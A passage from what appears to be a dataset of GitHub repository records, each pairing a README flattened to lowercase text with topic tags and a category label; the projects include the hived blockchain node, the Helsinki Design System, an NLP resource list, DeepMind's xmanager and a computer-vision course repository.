statement and emulates direct hived usage run hived img sh scripts run hived img sh this script is the recommended way to launch the hived docker container general usage run hived img sh docker img option value hived option read more about using run hived img sh doc run hived img md in various scenarios cli wallet we provide a basic cli wallet for interfacing with hived the wallet is self documented via command line help the node you connect to via the cli wallet needs to be running the account by key api condenser api database api account history api wallet bridge api plugins and needs to be configured to accept websocket connections via webserver ws endpoint the cli wallet offers two operating modes interactive mode commands are entered on an interactive command line daemon mode wallet commands are sent via rpc calls in daemon mode it is important to specify which ip addresses are allowed to establish connections to the wallet s http server see rpc http endpoint daemon rpc http allowip options for details to prepare transactions you need to execute a few setup steps in the cli wallet use set password password call to establish a password protecting your wallet from unauthorized access use unlock password to turn on full operation mode in the wallet import private key s using import key wif key command keys and password are stored in the wallet json file testing see doc devs testing md doc devs testing md for testing build targets and info on how to use lcov to check code coverage of tests configuration config file run hived once to generate a data directory and a config file the default data directory location is hived kill hived if you want to modify the config to your liking we have example config contrib config for docker ini used in the docker image all options will be present in the default config file and there may be more options that need to be changed from the docker configs some of the options actually used in images are configured via command line seed nodes a list of some seed nodes to get you started can be found in doc seednodes txt doc seednodes txt this same file is baked into the docker images and can be overridden by setting hived seed nodes in the container environment at docker run time to a whitespace delimited list of seed nodes with port system requirements running a hive consensus node requires the following hardware resources data directory to hold a blockchain file s 550gb of disk storage is required storage to hold a shared memory file 30gb of memory is required at the moment to store state data no support no warranty the software is provided as is without warranty of any kind express or implied including but not limited to the warranties of merchantability fitness for a particular purpose and noninfringement in no event shall the authors or copyright holders be liable for any claim damages or other liability whether in an action of contract tort or otherwise arising from out of or in connection with the software or the use or other dealings in the software
hive blockchain decentralization dapps platform openhive p2p cryptocurrency web3
blockchain
helsinki-design-system
h1 align center helsinki design system h1 div align center strong design system for the city of helsinki strong div div align center helsinki design system hds is an open source design system built by the city of helsinki it consists of tools for development and design as well as resources and guidelines for creating user friendly accessible solutions for the city div br div align center version a href https github com city of helsinki helsinki design system releases latest img src https img shields io github v release city of helsinki helsinki design system label version style flat square alt version a licence a href https github com city of helsinki helsinki design system blob master license img src https img shields io github license city of helsinki helsinki design system style flat square alt licence mit a div div align center h4 a href http hds hel fi hds documentation a span span a href https hds hel fi components available components a span span a href https hds hel fi storybook react react storybook a span span a href https hds hel fi storybook core core storybook a span span a href https hds hel fi getting started contributing how to contribute contributing a h4 div features accessibility baked in all hds components are designed from the ground up to be as accessible as possible components go through a third party accessibility audit before release react css components are available both as react and css styles choose the one which suits best for your project customizable hds components are designed to be customizable to allow expressing the vibrant helsinki brand design and implementation in sync designers use a collection of sketch libraries which are perfectly in sync with the implementation packages hds is divided into three 3 separate packages npm https img shields io npm v hds core label hds core style flat square https www npmjs com package hds core helsinki city brand colors typography and base styles as css styles and variables npm https img shields io npm v hds react label hds react style flat square https www npmjs com package hds react provides hds components implemented using react npm https img shields io npm v hds design tokens label hds design tokens style flat square https www npmjs com package hds design tokens basis of the hds which includes base colors typography etc as design tokens getting started wrench are you a developer if yes start by checking out hds for developers page https hds hel fi getting started developer br art are you a designer if yes start by checking out hds for designers page https hds hel fi getting started designer helsinki design system uses lerna https lerna js org for running scripts across the repo as well as versioning and creating releases of the packages yarn workspaces https yarnpkg com lang en docs workspaces is used to manage dependencies this allows the separate packages to reference each other via symlinks during local development using the packages in your project see the package specific instructions on how to get started using the packages hds design tokens packages design tokens readme md getting started hds core packages core readme md getting started hds react packages react readme md getting started setting up local development environment start setting up your local development by going through the steps in the development guide development md contributing before contributing it is recommended to read hds contribution before contributing page https hds hel fi getting started contributing how to contribute we are accepting new features feature requests and help with improving the documentation there are multiple ways you can contribute opening issues https github com city of helsinki helsinki design system issues about bugs improvements new features etc opening pull requests https github com city of helsinki helsinki design system pulls with changes fixes new features etc opening branches in abstract to propose new component designs or design changes more information about design contribution can be found in hds contribution design page https hds hel fi getting started contributing design take part in discussion and commenting new hds features the easiest way to do this is to browse open issues https github com city of helsinki helsinki design system issues and pull requests https github com city of helsinki helsinki design system pulls and leave a comment if you have an access to the city of helsinki slack you may also join the discussion there more info about the ways to contact us can be found in hds about support page https hds hel fi about
design-system design-systems css sass react
os
Klue_InforTechTutorials
klue infortechtutorials information technology tutaring system
server
NLP101
nlp 101 a resource repository for deep learning and natural language processing this document is drafted for those who have enthusiasm for deep learning in natural language processing if there are any good recommendations or suggestions i will try to add more this document is drafted with the rules as follows materials that are considered to cover the same grounds will not be recorded repeatedly only one among those within similar level of difficulty will be recorded materials with different level of difficulty that need prerequsite or additional learning will be recorded language korean readme kr md english readme md br mathematics statistics and probabilities source description statistics 110 https www youtube com playlist list pl2sou6wwxb0uwwh80ktq6ht66kwxbztio a lecture on probability that can be easily understood by non engineering major students brandon foltz s statistics https www youtube com user bcfoltz playlists brandon foltz s probability and statistics lectures are posted on youtube and is rather short so it can be easily accessed during daily commute br linear algebra source description essence of linear algebra https www youtube com playlist list plzhqobowtqdpd3mizzm2xvfitgf8he ab a linear algebraic lecture on youtube channel 3blue1brown could be a big help for those planning to take undergraduate level linear algebra since it allows overall understanding it provides intutitively understandable visual aids to getting the picture of linear algebra linear algebra https www youtube com watch v zk3o402wf1c list ple7ddd91010bc51f8 a legendary lecture of professor gilbert strang matrix methods in data analysis and machine learning https www youtube com watch v cx5z oslnwe list plul4u3cngp63omnuhxqiucrks2pivhn3k professor gilbert strang s lecture on applied linear algebra as linear algbra is prerequisite knowledge here it is quite difficult to understand yet a great lecture to learn how linear algebra is actually applied in the field of machine learning br basic mathematics overview source description essence of calculus https www youtube com playlist list plzhqobowtqdmsr9k rj53dwvrmyo3t5yr a calculus lecture by the channel 3blue1brown mentioned above helpful for those who want an overview of calculus likewise calculus https ocw mit edu ans7870 resources strang edited calculus calculus pdf a coursebook on calculus written by professor gilbert strang there is no need to go through the whole book but chapters 2 4 11 13 15 16 are very worth studying mathematics for machine learning https mml book github io a book on all the mathematical knowledge accompanied with machine learning mathematic knowledge within the collegiate level of natural sciences or engineering is preferable here as the explanations are mainly broad brush br deep learning and natural language processing deep learning source description cs230 https www youtube com results search query cs230 a deep learning lecture of the renouned professor andrew ng who has recently founded a startup on ai education deep learning book https www deeplearningbook org a book written by ian goodfellow the father of gan and other renouned professors dive into deep learning https d2l ai while the deep learning book above has theoretical explanation this book also includes the codes to check how the notion is actually immplemented grokking deep learning https www manning com books grokking deep learning teaches readers how to write basic elements of the neural network with numpy without using deep learning frameworks also a good material to study how high level apis work under the hood br natural language processing source description neural network methods for nlp https www morganclaypool com doi abs 10 2200 s00762ed1v01y201703hlt037 an nlp book using deep learning written by yoav goldberg it has witty explanations that lead to the fundamentals eisenstein s nlp note https github com jacobeisenstein gt nlp class blob master notes eisenstein nlp notes pdf awesome book to read that deals with not only nlp with machine learning but also the basic linguistic knowledge to understand it eisenstein s book introduction to natural language processing https www amazon com introduction language processing adaptive computation dp 0262042843 was published based on this note cs224n https www youtube com watch v 8rxd5 xhemo list ploromvodv4rohcuxmzknm7j3fvwbby42z awesome nlp lecture from stanford it has the 2019 version dealing with the latest trends cs224u https www youtube com watch v tz jrc nrjy list ploromvodv4robpmcir6rnnulfan56js20 an nlp lecture that was revalued since the advent of glue benchmark recommended to be taken after cs224n and its merit is that it provides exercises in pytorch code first intro to natural language processing https www youtube com playlist list pltmwhnx gukkocxqokqjuvxglsdywssh9 a code first nlp lecture by rachel thomas the co founder of fast ai the motivation that rachel thomas gives is mind blowing natural language processing with pytorch https www amazon com natural language processing pytorch applications dp 1491978236 an nlp book from o reilly known for numerous data science books of great quality it is pytorch friendly as all the codes are written in pytorch linguistic fundamentals for natural language processing https www amazon com linguistic fundamentals natural language processing dp 1627050116 a linguistics book written by the linguist emily bender known for bender rule although not deep learning related it is a great beginner s book on linguistic domain knowledge br libraries related to the natural language processing source description numpy http cs231n github io python numpy tutorial stanford s lecture cs231n deals with numpy which is fundamental in machine learning calculations tensorflow https www tensorflow org tutorials text word embeddings a tutorial provided by tensorflow it gives great explanations on the basics with visual aids pytorch https pytorch org tutorials an awesome tutorial on pytorch provided by facebook with great quality tensor2tensor https github com tensorflow tensor2tensor sequence to sequence tool kit by google written in tensorflow fairseq https github com pytorch fairseq sequence to sequence tool kit by facebook written in pytorch hugging face transformers https github com huggingface transformers a library based on transformer provided by hugging face that allows easy access to pre trained models one of the key nlp libraries to not only developers but researchers as well hugging face tokenizers https github com huggingface tokenizers a tokenizer library that hugging face maintains it boosts fast operations as the key functions are written in rust the latest tokenizers such as bpe can be tried out with hugging face tokenizers spacy https course spacy io a tutorial written by ines the core developer of the noteworthy spacy torchtext https mlexplained com 2018 02 08 a comprehensive tutorial to torchtext a tutorial on torchtext a package that makes data preprocessing handy has more details than the official documentation sentencepiece https github com google sentencepiece google s open source library that builds bpe based vocabulary using subword information br useful materials the big bad nlp database https quantumstat com dataset dataset html br awesome blogs blog article you should read christopher olah s blog https colah github io understanding lstm networks https colah github io posts 2015 08 understanding lstms jay alammar s blog http jalammar github io illustrated word2vec http jalammar github io illustrated word2vec sebastian ruder s blog http ruder io tracking progress in natural language processing https nlpprogress com chris mccormick s blog http mccormickml com word2vec tutorial the skip gram model http mccormickml com 2016 04 19 word2vec tutorial the skip gram model the gradient https thegradient pub evaluation metrics for language modeling https thegradient pub understanding evaluation metrics for language models distill pub https distill pub visualizing memorization in rnns https distill pub 2019 memorization in rnns thomas wolf s blog https medium com thomwolf the current best of universal word embeddings and sentence embeddings https medium com huggingface universal word sentence embeddings ce48ddc8fc3a dair ai https medium com dair ai a light introduction to transfer learning for nlp https medium com dair ai a light introduction to transfer learning for nlp 3e2cb56b48c8 machine learning mastery https machinelearningmastery com how to develop a neural machine translation system from scratch https machinelearningmastery com develop neural machine translation system keras br nlp specialists you should remember not enumarted by rank name description known for kyunghyun cho professor nyu gru https arxiv org abs 1406 1078 yejin choi professor washington univ grover https arxiv org abs 1905 12616 yoon kim ph d candidate harvard univ cnn for nlp https www aclweb org anthology d14 1181 minjoon seo researcher clova ai allen ai bidaf https arxiv org abs 1611 01603 kyubyong park researcher kakao brain paper implementation nlp with korean language https github com kyubyong tomas mikolov researcher fair word2vec https papers nips cc paper 5021 distributed representations of words and phrases and their compositionality pdf omer levy researcher fair various word embedding techniques https scholar google co il citations user pzvd2h8aaaaj hl en jason weston researcher fair memory networks https arxiv org abs 1410 3916 yinhan liu researcher fair roberta https arxiv org pdf 1907 11692 pdf guillaume lample researcher fair xlm https arxiv org pdf 1901 07291 pdf alexis conneau researcher fair xlm r https arxiv org abs 1901 07291 mike lewis researcher fair bart https arxiv org abs 1910 13461 ashish vaswani researcher google transformer https arxiv org abs 1706 03762 jacob devlin researcher google bert https arxiv org abs 1810 04805 kenton lee researcher google e2e coref https arxiv org abs 1707 07045 matthew peters researcher allen ai elmo https arxiv org abs 1802 05365 alec radford researcher open ai gpt 2 https d4mucfpksywv cloudfront net better language models language models are unsupervised multitask learners pdf sebastian ruder researcher deepmind nlp progress https nlpprogress com richard socher researcher salesforce glove https www aclweb org anthology d14 1162 jeremy howard co founder fast ai ulmfit https arxiv org abs 1801 06146 thomas wolf lead engineer hugging face pytorch transformers https github com huggingface pytorch transformers luke zettlemoyer professor washington univ elmo https arxiv org abs 1802 05365 yoav goldberg professor bar ilan univ neural net methods for nlp https www morganclaypool com doi abs 10 2200 s00762ed1v01y201703hlt037 chris manning professor stanford univ cs224n https www youtube com watch v 8rxd5 xhemo list ploromvodv4rohcuxmzknm7j3fvwbby42z dan jurafsky professor stanford univ speech and language processing https web stanford edu jurafsky slp3 graham neubig professor cmu neural nets for nlp https www youtube com watch v pmcxgntuhnk list pl8pytp1v4i8ajj7sy6sdtmjgkt7eo2vms sam bowman professor nyu nli benchmark https nlp stanford edu pubs snli paper pdf nikita kitaev ph d candidate uc berkeley reformer https arxiv org abs 2001 04451 zihang dai ph d candidate cmu transformer xl https arxiv org abs 1901 02860 zhilin yang ph d candidate cmu xlnet https arxiv org abs 1906 08237 abigail see ph d candidate stanford univ pointer generator http www abigailsee com 2017 04 16 taming rnns for better summarization html kevin clark ph d candidate stanford univ electra https arxiv org abs 2003 10555 eric wallace ph d candidate berkely univ allennlp interpret https arxiv org abs 1909 09251 br research conferences acl https www aclweb org portal aaai http www aaai org conll https www conll org coling https dblp org db conf coling index emnlp https www aclweb org anthology venues emnlp eurnlp https www eurnlp org iclr https www iclr cc icml https icml cc ijcai https www ijcai org naacl https www aclweb org anthology venues naacl neurips https nips cc
deep-learning natural-language-processing awesome-list mathematics
ai
embeddedObjectExtractor
embeddedobjectextractor this is a information extraction system designed to extract embedded objects such as tables from pdf documents
os
blockchain_go
blockchain in go a blockchain implementation in go as described in these articles 1 basic prototype https jeiwan net posts building blockchain in go part 1 2 proof of work https jeiwan net posts building blockchain in go part 2 3 persistence and cli https jeiwan net posts building blockchain in go part 3 4 transactions 1 https jeiwan net posts building blockchain in go part 4 5 addresses https jeiwan net posts building blockchain in go part 5 6 transactions 2 https jeiwan net posts building blockchain in go part 6 7 network https jeiwan net posts building blockchain in go part 7
golang blockchain bitcoin cryptocurrency
blockchain
xmanager
xmanager a framework for managing machine learning experiments note that links in readme md have to be absolute as it also lands on pypi xmanager is a platform for packaging running and keeping track of machine learning experiments it currently enables one to launch experiments locally or on google cloud platform gcp https cloud google com interaction with experiments is done via xmanager s apis through python launch scripts check out these slides https storage googleapis com gresearch xmanager deepmind xmanager slides pdf for a more detailed introduction to get started install xmanager install xmanager its prerequisites prerequisites if needed and follow the tutorial writing xmanager launch scripts or a codelab colab notebook https colab research google com github deepmind xmanager blob master colab codelab ipynb jupyter notebook https github com deepmind xmanager blob main jupyter codelab ipynb to create and run a launch script see contributing md https github com deepmind xmanager blob main contributing md for guidance on contributions install xmanager bash pip install git https github com deepmind xmanager git or alternatively a pypi project https pypi org project xmanager is also available bash pip install xmanager on debian based systems xmanager and all its dependencies can be installed and set up by cloning this repository and then running sh cd xmanager setup scripts chmod x setup all sh setup all sh prerequisites the codebase assumes python 3 9 install docker optional if you use xmanager xm pythondocker to run xmanager experiments you need to install docker 1 follow the steps https docs docker com engine install supported platforms to install docker 2 and if you are a linux user follow the steps https docs docker com engine install linux postinstall to enable sudoless docker install bazel optional if you use xmanager xm local bazelcontainer or xmanager xm local bazelbinary to run xmanager experiments you need to install bazel 1 follow the steps https docs bazel build versions master install html to install bazel create a gcp project optional if you use xm local vertex vertex ai https cloud google com vertex ai to run xmanager experiments you need to have a gcp project in order to be able to access vertex ai to run jobs 1 create https console cloud google com a gcp project 2 install https cloud google com sdk docs install gcloud 3 associate your google account gmail account with your gcp project by running bash export gcp project gcp project id gcloud auth login gcloud auth application default login gcloud config set project gcp project 4 set up gcloud to work with docker by running bash gcloud auth configure docker 5 enable google cloud platform apis enable https console cloud google com apis library iam googleapis com iam enable https console cloud google com apis library aiplatform googleapis com the cloud ai platfrom enable https console cloud google com apis library containerregistry googleapis com the container registry 6 create a staging bucket in us central1 if you do not already have one this bucket should be used to save experiment artifacts like tensorflow log files which can be read by tensorboard this bucket may also be used to stage files to build your docker image if you build your images remotely bash export google cloud bucket name google cloud bucket name gsutil mb l us central1 gs google cloud bucket name add google cloud bucket name to the environment variables or your bashrc bash export google cloud bucket name google cloud bucket name writing xmanager launch scripts details summary a snippet for the impatient summary python contains core primitives and apis from xmanager import xm implementation of those core concepts for what we call the local backend which means all executables are sent for execution from this machine independently of whether they are actually executed on our machine or on gcp from xmanager import xm local creates an experiment context and saves its metadata to the database which we can reuse later via xm local list experiments for example note that experiment has tracking properties such as id with xm local create experiment experiment title cifar10 as experiment packaging prepares a given executable spec for running with a concrete executor spec depending on the combination that may involve building steps and or copying the results somewhere for example a xm python container designed to run on kubernetes will be built via docker build and the new image will be uploaded to the container registry but for our simple case where we have a prebuilt linux binary designed to run locally only some validations are performed for example that the file exists executable contains all the necessary information needed to launch the packaged blob via add see below executable experiment package xm binary what we are going to run path home user project a out where we are going to run it executor spec xm local local spec let s find out which batch size is best presumably our jobs write the results somewhere for batch size in 64 1024 add creates a new experiment unit which is usually a collection of semantically united jobs and sends them for execution to pass an actual collection one may want to use jobgroup s more about it later in the documentation but for our purposes we are going to pass just one job experiment add xm job the a out we packaged earlier executable executable we are using the default settings here but executors have plenty of arguments available to control execution executor xm local local time to pass the batch size as a command line argument args batch size batch size we can also pass environment variables env vars heapprofile tmp a out hprof the context will wait for locally run things but not for remote things such as jobs sent to gcp although they can be explicitly awaited via wait for completion details the basic structure of an xmanager launch script can be summarized by these steps 1 create an experiment and acquire its context python from xmanager import xm from xmanager import xm local with xm local create experiment experiment title cifar10 as experiment 2 define specifications of executables you want to run python spec xm pythoncontainer path path to python folder entrypoint xm modulename cifar10 3 package your executables python executable experiment package xm packageable executable spec spec executor spec xm local vertex spec 4 define your hyperparameters python import itertools batch sizes 64 1024 learning rates 0 1 0 001 trials list dict batch size bs learning rate lr for bs lr in itertools product batch sizes learning rates 5 define resource requirements for each job python requirements xm jobrequirements t4 1 6 for each trial add a job job groups to launch them python for hyperparameters in trials experiment add xm job executable executable executor xm local vertex requirements requirements args hyperparameters now we should be ready to run run xmanager the launch script to learn more about different executables and executors follow components components run xmanager bash xmanager launch xmanager examples cifar10 tensorflow launcher py in order to run multi job experiments the xm wrap late bindings flag might be required bash xmanager launch xmanager examples cifar10 tensorflow launcher py xm wrap late bindings todo elaborate on why that is necessary components executable specifications xmanager executable specifications define what should be packaged in the form of binaries source files and other input dependencies required for job execution executable specifications are reusable and generally platform independent see executable specs md https github com deepmind xmanager blob main docs executable specs md for details on each executable specification name description xmanager xm container a pre built tar image xmanager xm bazelcontainer a bazel https bazel build target producing a tar image xmanager xm binary a pre built binary xmanager xm bazelbinary a bazel https bazel build target producing a self contained binary xmanager xm pythoncontainer a directory with python modules to be packaged as a docker container executors xmanager executors define a platform where the job runs and resource requirements for the job each executor also has a specification which describes how an executable specification should be prepared and packaged see executors md https github com deepmind xmanager blob main docs executors md for details on each executor name description xmanager xm local local runs a binary or a container locally xmanager xm local vertex runs a container on vertex ai create a gcp project optional xmanager xm local kubernetes runs a container on kubernetes job jobgroup a job represents a single executable on a particular executor while a jobgroup unites a group of job s providing a gang scheduling concept job s inside them are scheduled descheduled simultaneously same job and jobgroup instances can be add ed multiple times job a job accepts an executable and an executor along with hyperparameters which can either be command line arguments or environment variables command line arguments can be passed in list form arg1 arg2 arg3 bash binary arg1 arg2 arg3 they can also be passed in dictionary form key1 value1 key2 value2 bash binary key1 value1 key2 value2 environment variables are always passed in dict str str form bash export key value jobs are defined like this python executable xm package executor xm local vertex xm job executable executable executor executor args batch size 64 env vars nccl debug info jobgroup a jobgroup accepts jobs in a kwargs form the keyword can be any valid python identifier for example you can call your jobs agent and observer python agent job xm job observer job xm job xm jobgroup agent agent job observer observer job
ai
bootloader
bootloader bootloader design for mcus in embedded systems
os
CovIndia-Website
coronavisualizer netlify status https api netlify com api v1 badges c6d65259 b62e 4e78 ac63 81b6df831fd4 deploy status https app netlify com sites covindia deploys covindia s website deployed on netlify
districtwise tracker coronavirus covid19 covid19-live-tracker covid19-india coronavirus-tracking coronavirus-real-time
front_end
Machine-Learning-Algorithms-from-Scratch
machine learning algorithms from scratch implementing machine learning algorithms from scratch algorithms implemented so far 1 simple linear regression dataset stock data from quandl 2 logistic regression dataset stanford ml course dataset 3 naive bayes classifier dataset email spam non span 4 decision trees 5 k nearest neighbours k nearest neighbours in parallel dataset chronic kidney disease data from uci 6 a star algorithm 7 k means clustering k means clustering in parallel dataset ipl player stats norm data 8 support vector machine
machine-learning machine-learning-algorithms machine-learning-python machine-learning-scratch supervised-learning unsupervised-learning
ai
Bootstrap-Pencil-Stencils
bootstrap pencil stencils no longer actively developed other commitments and the fact i no longer use pencil mean this repo is no longer being actively developed pull requests with new features fixes are still welcome as are new issues but my responses might not be the speediest ui components from the bootstrap front end framework as a pencil stencil collection see 1 issues 1 for a full list of included components requests contributions welcome check out my other stencil collections for pencil at nathanielw github io pencil stencils http nathanielw github io pencil stencils example mockup made with the collection misc preview png some of the included components see 1 issues 1 for a full list installation 1 download the zip for the latest release https github com nathanielw bootstrap pencil stencils releases latest make sure you grab the bootstrap pencil stencils vx x x zip file not the source code zip 2 in pencil install the zip via tools install new collection updating right click on the collection in pencil s sidebar and choose uninstall this collection before repeating the installation steps notes a lot of the elements provide variations which can be accessed by right clicking on the element once it s on the canvas license released under the mit license see license for full text a link back here is appreciated when sharing mockups images created with this collection but not required
front_end
step-up-it
step up to information technology step up to information technology is a newly designed nine week program for women interested in the field of it focusing on front end web development skills such as coding and programming http vtworksforwomen org suit this is the content for the course website and uses jekyll http jekyllrb com as a static site generator and github pages https pages github com for hosting
server
graphml-tutorials
tutorials for machine learning on graphs github workflow status https img shields io github workflow status mims harvard graphml tutorials run 20dependency 20test logo python logocolor 23ee4c2c style flat contributors payal chandak chandak mit edu haoxin li haoxin li hsph harvard edu min jean cho min jean cho brown edu pavlin policar pavlin policar fri uni lj si mert erden mert erden tufts edu steffan paul steffanpaul g harvard edu marinka zitnik marinka hms harvard edu overview graph machine learning provides a powerful toolbox to learn representations from any arbitrary graph structure and use learned representations for a variety of downstream tasks these tutorials aim to 1 introduce the concept of graph neural networks gnns 2 discuss the theoretical motivation behind different gnn architectures 3 provide implementations of these architectures 4 apply the architectures to key prediction problems on interconnected data in science and medicine 5 provide end to end real world examples of graph machine learning graph ml graphml png requirements recent versions of numpy pytorch pytorch geometric and jupyter are required installation all the required packages can be installed using the following commands 1 git clone https github com mims harvard graphml tutorials git 2 cd graphml tutorials 3 chmod x install sh install sh 4 conda activate graphml venv contributing pull requests are welcome license mit https choosealicense com licenses mit
graph-neural-networks embeddings network-embeddings representation-learning graph-convolutional-networks networks tutorials graph-ml deep-learning
ai
Computer-vision
computer vision this is the source code that summarizes the codes that i have gathered while attending professor sungho kim s class yeungnam university computer vision class and my personal studies 0 outline 1 install opencv 1 install opencv 2 camera distortion 2 camera distortion 3 color space 3 color space 4 image filtering 4 image filtering 5 edge 5 edge 6 corner and blob detector 6 corner and blob detector 7 fitting 7 fitting 8 calibration 8 calibration 9 stereo matching and rendering 9 stereo matching and rendering 10 face and body detection 10 face and body detection 1 install opencv i installed opencv version 2 4 13 6 https opencv org releases environment variables c opencv24136 build x86 vc14 bin vs setting include directories c opencv24136 build include library directories c opencv24136 build x86 vc14 lib additional dependencies opencv calib3d2413d lib opencv contrib2413d lib opencv core2413d lib opencv features2d2413d lib opencv flann2413d lib opencv gpu2413d lib opencv highgui2413d lib opencv imgproc2413d lib opencv legacy2413d lib opencv ml2413d lib opencv nonfree2413d lib opencv objdetect2413d lib opencv ocl2413d lib opencv photo2413d lib opencv stitching2413d lib opencv superres2413d lib opencv ts2413d lib opencv video2413d lib opencv videostab2413d lib go 0 outline 0 outline 2 camera distortion result input output soccer distortion https user images githubusercontent com 56310078 76083123 34bfdb80 5ff0 11ea 9796 43c0a911ceac jpg 2 camera distortion result https user images githubusercontent com 56310078 76083138 3a1d2600 5ff0 11ea 9433 7b1abac7e9c6 jpg go 0 outline 0 outline 3 color space result input output blue output green output red corni fructus https user images githubusercontent com 56310078 76083276 92ecbe80 5ff0 11ea 8aef 60ea1ed2a52c jpg 3 color blue https user images githubusercontent com 56310078 76083261 89fbed00 5ff0 11ea 8c9f 0ee4d846f4d7 jpg 3 color green https user images githubusercontent com 56310078 76083263 8b2d1a00 5ff0 11ea 8706 a884edb95961 jpg 3 color red https user images githubusercontent com 56310078 76083266 8cf6dd80 5ff0 11ea 8b5e df3049b0cc12 jpg another result input output blue output green output red img src https user images githubusercontent com 56310078 76084072 718cd200 5ff2 11ea 98cd 8b92390aea6a jpg width 200 height 200 img src https user images githubusercontent com 56310078 76084158 9bde8f80 5ff2 11ea 815f 0a85ca2403bb jpg width 200 height 200 img src https user images githubusercontent com 56310078 76084154 9aad6280 5ff2 11ea 800c e2061737eb9c jpg width 200 height 200 img src https user images githubusercontent com 56310078 76084152 997c3580 5ff2 11ea 957d aa1a98f2e491 jpg width 200 height 200 input color input output blue output green output red img src https user images githubusercontent com 56310078 76084072 718cd200 5ff2 11ea 98cd 8b92390aea6a jpg width 200 height 200 img src https user images githubusercontent com 56310078 76084514 5cfd0980 5ff3 11ea 998d 8f1f670e204c png width 200 height 200 img src https user images githubusercontent com 56310078 76084510 5bcbdc80 5ff3 11ea 9e21 df6b9b88bbf3 png width 200 height 200 img src https user images githubusercontent com 56310078 76084508 5b334600 5ff3 11ea 87be 4d03309f7a99 png width 200 height 200 builtin function vs implementation rgb to gray input output builtin output implementation img src https user images githubusercontent com 56310078 76084072 718cd200 5ff2 11ea 98cd 8b92390aea6a jpg width 250 height 250 img src https user images githubusercontent com 56310078 76085021 8cf8dc80 5ff4 11ea 809e fc485a5e0b13 jpg width 250 height 250 img src https user images githubusercontent com 56310078 76085028 8e2a0980 5ff4 11ea 9498 d9712e9057e9 jpg width 250 height 250 builtin function vs implementation rgb to hsi input output builtin hsv output implementation hsi img src https user images githubusercontent com 56310078 76084072 718cd200 5ff2 11ea 98cd 8b92390aea6a jpg width 250 height 250 img src https user images githubusercontent com 56310078 76085641 cc73f880 5ff5 11ea 9b2b a8f3ff258cff jpg width 250 height 250 img src https user images githubusercontent com 56310078 76085643 cda52580 5ff5 11ea 805c bf5fe749549a jpg width 250 height 250 hsi hue saturation intensity of implementation hue saturation intensity img src https user images githubusercontent com 56310078 76085648 ced65280 5ff5 11ea 8844 9f5ed2b783f7 jpg width 250 height 250 img src https user images githubusercontent com 56310078 76085649 d0077f80 5ff5 11ea 9dfa 1fd499205b3d jpg width 250 height 250 img src https user images githubusercontent com 56310078 76085653 d1d14300 5ff5 11ea 9c1b 8adfb4fb283b jpg width 250 height 250 builtin function vs implementation rgb to hsv input output builtin hsv output implementation hsv img src https user images githubusercontent com 56310078 76084072 718cd200 5ff2 11ea 98cd 8b92390aea6a jpg width 250 height 250 img src https user images githubusercontent com 56310078 76085641 cc73f880 5ff5 11ea 9b2b a8f3ff258cff jpg width 250 height 250 img src https user images githubusercontent com 56310078 76090098 4d36f280 5ffe 11ea 8a92 a61d428e682a jpg width 250 height 250 hsv hue saturation value of implementation hue saturation value img src https user images githubusercontent com 56310078 76090099 4dcf8900 5ffe 11ea 8440 e5c01638803f jpg width 250 height 250 img src https user images githubusercontent com 56310078 76090103 4f00b600 5ffe 11ea 9c7b adc461fc66ef jpg width 250 height 250 img src https user images githubusercontent com 56310078 76090104 5031e300 5ffe 11ea 9a5e 15bb1915c41e jpg width 250 height 250 go 0 outline 0 outline 4 image filtering blur result smoothed image input output kernel 1x1 output kernel 3x3 output kernel 5x5 img src https user images githubusercontent com 56310078 76087010 a56af600 5ff8 11ea 8817 9f2f09786918 jpg width 150 height 150 img src https user images githubusercontent com 56310078 76087030 ae5bc780 5ff8 11ea 8a91 f8ee28d74448 jpg width 150 height 150 img src https user images githubusercontent com 56310078 76087032 aef45e00 5ff8 11ea 9d2d a7a82587b9b9 jpg width 150 height 150 img src https user images githubusercontent com 56310078 76087033 b0258b00 5ff8 11ea 9d17 a4fd3d094acd jpg width 150 height 150 output kernel 11x11 output kernel 19x19 output kernel 25x25 output kernel 29x29 img src https user images githubusercontent com 56310078 76087054 b582d580 5ff8 11ea 82d9 9dfe15ac3667 jpg width 150 height 150 img src https user images githubusercontent com 56310078 76087057 b7e52f80 5ff8 11ea 9227 d35d6239d454 jpg width 150 height 150 img src https user images githubusercontent com 56310078 76087063 bae02000 5ff8 11ea 824b b35839d9a86e jpg width 150 height 150 img src https user images githubusercontent com 56310078 76087073 bddb1080 5ff8 11ea 80ac a4f2ef0bd19b jpg width 150 height 150 salt pepper result filtered image median vs gaussian input output salt pepper noised img src https user images githubusercontent com 56310078 76087010 a56af600 5ff8 11ea 8817 9f2f09786918 jpg width 400 height 400 img src https user images githubusercontent com 56310078 76087513 a5b7c100 5ff9 11ea 8baa a7b3ff27ca0d jpg width 400 height 400 output median filtered 1x1 output gaussian filtered 1x1 img src https user images githubusercontent com 56310078 76088019 a866e600 5ffa 11ea 9f67 ec1d50d24bad jpg width 400 height 400 img src https user images githubusercontent com 56310078 76087994 9e44e780 5ffa 11ea 95b1 3e4327836b82 jpg width 400 height 400 output median filtered 3x3 output gaussian filtered 3x3 img src https user images githubusercontent com 56310078 76088022 a9981300 5ffa 11ea 9b17 ef56a9f42179 jpg width 400 height 400 img src https user images githubusercontent com 56310078 76087996 9f761480 5ffa 11ea 9a1f f8a48aa4ded1 jpg width 400 height 400 output median filtered 5x5 output gaussian filtered 5x5 img src https user images githubusercontent com 56310078 76088026 aac94000 5ffa 11ea 9ef0 a4558ff3551f jpg width 400 height 400 img src https user images githubusercontent com 56310078 76088000 a00eab00 5ffa 11ea 83a5 6482c657e488 jpg width 400 height 400 output median filtered 7x7 output gaussian filtered 7x7 img src https user images githubusercontent com 56310078 76088030 abfa6d00 5ffa 11ea 9140 4676a85bce24 jpg width 400 height 400 img src https user images githubusercontent com 56310078 76088004 a1d86e80 5ffa 11ea 9081 5ff3e7397004 jpg width 400 height 400 output median filtered 9x9 output gaussian filtered 9x9 img src https user images githubusercontent com 56310078 76088034 ad2b9a00 5ffa 11ea 9f2a 0f48d104fbd8 jpg width 400 height 400 img src https user images githubusercontent com 56310078 76088008 a3a23200 5ffa 11ea 8831 3786e2c9e1de jpg width 400 height 400 salt pepper result filtered image sigma of gaussian output sigmax sigmay 1 output sigmax sigmay 3 output sigmax sigmay 5 img src https user images githubusercontent com 56310078 76088415 5d999e00 5ffb 11ea 8fd4 eb671fb59f81 jpg width 300 height 300 img src https user images githubusercontent com 56310078 76088419 5ffbf800 5ffb 11ea 8620 d00012e82785 jpg width 300 height 300 img src https user images githubusercontent com 56310078 76088427 612d2500 5ffb 11ea 91a9 51cd4bd04892 jpg width 300 height 300 gaussian noised result filtered image median vs 